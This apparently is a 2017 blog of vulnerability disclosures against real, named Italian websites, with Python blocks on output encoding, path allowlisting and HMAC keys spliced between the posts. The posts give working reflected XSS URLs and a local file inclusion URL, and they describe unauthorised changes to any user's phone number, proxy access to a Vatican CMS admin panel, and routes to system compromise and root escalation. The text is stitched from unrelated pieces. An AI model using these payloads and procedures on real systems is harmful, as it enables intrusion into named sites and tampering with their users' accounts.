Tuesday, 3 October 2017

http://www.carminevalentino.it/ | xss

http://www.carminevalentino.it/

The filesystem path is disclosed in the 404 error pages:
D:\inetpub\webs\carminevalentinoit\


XSS

http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1


The same injection point also lets us place any video in the page content.

Example:
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1


shortened url: https://goo.gl/sWhg1P
archived url: http://archive.is/25Bw8

http://www.tourism-solutions.tech/ | xss - system compromise

http://www.tourism-solutions.tech regularly sends spam emails.

There is a fake unsubscribe script that reports a successful removal for any input, even when that input is a simple XSS payload.

http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com
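The two reflection points above (the `arg` parameter on carminevalentino.it, which lands inside a JavaScript string literal, and the `id` parameter of the unsubscribe script, which lands in HTML body text) share one root cause: the value is concatenated into the output without encoding for the context it ends up in. The following Python is an added example, not code from either site, showing context-aware encoding for both contexts and a quote-counting check that tells the raw concatenation apart from the encoded form; the payload strings are constructed from the query strings quoted above.

```python
import html
import json

# Constructed payloads, taken from the query strings quoted above.
JS_PAYLOAD = '");alert("xss;'                               # breaks out of a JS string
HTML_PAYLOAD = "<script>alert('xss');</script>yourmail.com"  # reflected into HTML


def vulnerable_player_script(video_url: str) -> str:
    """The pattern behind the bug: raw concatenation into a JS string literal."""
    return f's1.addVariable("file","{video_url}");'


def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal.

    json.dumps escapes quotes, backslashes and control characters; '<', '>'
    and '/' are escaped too so the literal can never close a <script> block.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("/", "\\/"))


def safe_player_script(video_url: str) -> str:
    """Same statement, with the parameter confined to the string literal."""
    return f's1.addVariable("file",{js_string_literal(video_url)});'


def safe_unsubscribe_message(address: str) -> str:
    """Reflect user input into HTML body text with entity encoding."""
    return f"<p>{html.escape(address, quote=True)} has been removed.</p>"


def unescaped_quote_count(js: str) -> int:
    """Count double quotes that are not backslash-escaped.

    A correctly built addVariable("file", "...") call has exactly four of
    them; any extra quote means the parameter escaped its literal.
    """
    count, i = 0, 0
    while i < len(js):
        if js[i] == "\\":
            i += 2  # skip the escaped character
            continue
        if js[i] == '"':
            count += 1
        i += 1
    return count
```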

____

The mail server can be exploited with an old remote exploit for Postfix on Debian Linux (Shellshock).

Monday, 2 October 2017

www.qumran2.net | XSS

Simple XSS
http://www.qumran2.net/indice.php?parole=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&p=barra_ric

Saturday, 30 September 2017

hacksannio.it (... other websites) | path disclosure, system compromise

By simply requesting the theme URL
http://www.hacksannio.it/wp-content/themes/betheme/

we trigger an error that discloses the path:

Fatal error: Uncaught Error: Call to undefined function get_header() in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php:10 Stack trace: #0 {main} thrown in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php on line 10

_______________
Update:
Once code execution is obtained, it is possible to escalate to root locally (exploit: openrestinpeace) and to cause a local DoS.

There are several other websites on the server:



Sunday, 24 September 2017

w2.vatican.va photovat.com | XSS, path disclosure


Simple XSS
http://w2.vatican.va/content/francesco/it/events/event.dir.html/content/vaticanevents/it/2017/4/229%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E

_____________________________________
Adobe Experience Manager CMS
A proxy is needed to connect, since access was probably restricted to a range of IP addresses.
-> Sample working proxy: 5.152.158.4:8080
Admin access: https://w2.vatican.va:4502/admin

SSL verification must be disabled (OCSP in Firefox).

Update: access is possible.
_____________________________________

Other websites
http://player.rv.va/rv.player01.asp?language=it&AudioLanguage=ita&visual=Tv&nocontrols=tr%27ue&fullframe=true&width=640&height=360%22%3E%3Cimg%20src=a%20onerror=alert(%221%22)%3E%3C%22&autoplay=true

_____________________________________
http://www.photovat.com
IIS server
D:\inetpub\webs\photovatcom

https://www.movimento5stelle.it | xss, stored xss, session theft, scripts errors, data leak, remote file inclusion, system compromise


https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi

File Inclusion
dodosmail.php is a bogus contact e-mail script.

http://www.movimento5stelle.it/parlamento/segnalazioni.html
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file]
Example:
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html

Archived page showing the inclusion of an HTML page available on the server: http://archive.is/vHgOn

Archived source of the Movable Type CGI (a bogus, obsolete version used on the website): http://archive.is/20Uen
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi

The script can be made to show errors that disclose the path:
Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58
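The inclusion works because the script hands the `dodosmail_header_file` request parameter straight to an include call, so any file the web server can read (here the Movable Type CGI source) is pulled into the output. Below is an added example in Python, not the site's code, of how such a header-file parameter should be resolved instead: an allowlist of bare file names plus a check that the resolved path stays inside one fixed directory, failing closed without echoing errors or paths. The directory and allowlist names are hypothetical.

```python
from pathlib import Path
from typing import Optional

# Hypothetical layout for this example: every includable header fragment lives
# here, and nothing outside this directory may ever be included.
HEADER_DIR = Path("/var/www/app/headers")
ALLOWED_HEADERS = frozenset({"default.html", "eventi.html"})


def resolve_header(requested: str, base: Path = HEADER_DIR,
                   allowed: frozenset = ALLOWED_HEADERS) -> Optional[Path]:
    """Map a user-supplied header name to a file, or None to refuse it.

    Check 1: the value must be a bare file name that is on the allowlist
             (this alone rejects "../", absolute paths and arbitrary files).
    Check 2: defence in depth, the resolved path must still be inside base,
             which also catches an allowlisted entry symlinked to elsewhere.
    """
    if Path(requested).name != requested or requested not in allowed:
        return None
    candidate = (base / requested).resolve()
    try:
        candidate.relative_to(base.resolve())
    except ValueError:
        return None
    return candidate


def header_fragment(requested: str) -> str:
    """What dodosmail-style code should do instead of include($_GET[...])."""
    path = resolve_header(requested)
    if path is None:
        return "<!-- header not available -->"   # fail closed, no path in output
    try:
        return path.read_text(encoding="utf-8")
    except OSError:
        return "<!-- header not available -->"   # never echo the error or path
```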


XSS
There are various XSS and stored XSS in the profile area.

It is possible to change the phone number even though they tried to hide it by setting the <input> as hidden (sigh).

When the XSS payloads are used, an error appears, probably related to the Movable Type CGI:
"Can't call method "id" on an undefined value"


The phone number of any registered user can be changed without authorization.
https://www.movimento5stelle.it/php/load_cid.php?userID=[progressiveinteger related to the user]&m=[email]&key=[fakekey]&sms_key=[fakekey.dot.fakekey]&verify=1&telefono=[telephone with international prefix]

The fake key can be produced from the keys generated for a dummy (but working) account.
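Two defects combine here: the handler accepts any `userID` without checking that it belongs to the logged-in user, and the verification key is not bound to the account, phone number or a validity period, so a key generated for one account works for another. The following Python is an added example, not the site's code, of a key that is an HMAC over the user, the new number and an expiry, verified after an ownership check; the secret and identifiers are constructed for the example.

```python
import hashlib
import hmac

# Constructed for this example; a real deployment loads it from configuration.
SERVER_SECRET = b"example-only-server-secret"


def _mac(user_id: int, phone: str, exp: int) -> str:
    """HMAC over exactly the fields the key must be bound to."""
    msg = f"{user_id}|{phone}|{exp}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_sms_key(user_id: int, phone: str, issued_at: int, ttl: int = 600) -> str:
    """Key sent by SMS: '<expiry>.<mac>', valid only for this user and number."""
    exp = issued_at + ttl
    return f"{exp}.{_mac(user_id, phone, exp)}"


def change_phone(session_user_id: int, user_id: int, phone: str,
                 sms_key: str, now: int) -> bool:
    """Server-side handler for the phone update.

    Authorisation comes first: the logged-in user may only touch their own
    record. Then the key must parse, be unexpired, and match the HMAC over
    exactly this user and phone, so a key from another account is useless.
    """
    if session_user_id != user_id:
        return False
    try:
        exp_str, mac = sms_key.split(".", 1)
        exp = int(exp_str)
    except ValueError:
        return False
    if now > exp:
        return False
    expected = _mac(user_id, phone, exp)
    # Constant-time comparison on bytes (compare_digest rejects non-ASCII str).
    return hmac.compare_digest(mac.encode(), expected.encode())
```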


____________________________________



Monday, 4 September 2017

https://iscriviti.radicali.it | errors, path disclosure, system compromise



https://iscriviti.radicali.it

Directly accessing this URL, we get an error that discloses the paths:
https://iscriviti.radicali.it/Landing/RegistraDati

D:\xampp\htdocs\radicali\landing_iscrizione\index.php

They are using Windows and XAMPP, which are not the best choice for a production server that stores sensitive data.

The PHP scripts use the CodeIgniter framework.

The archived error page:
http://archive.is/PFw55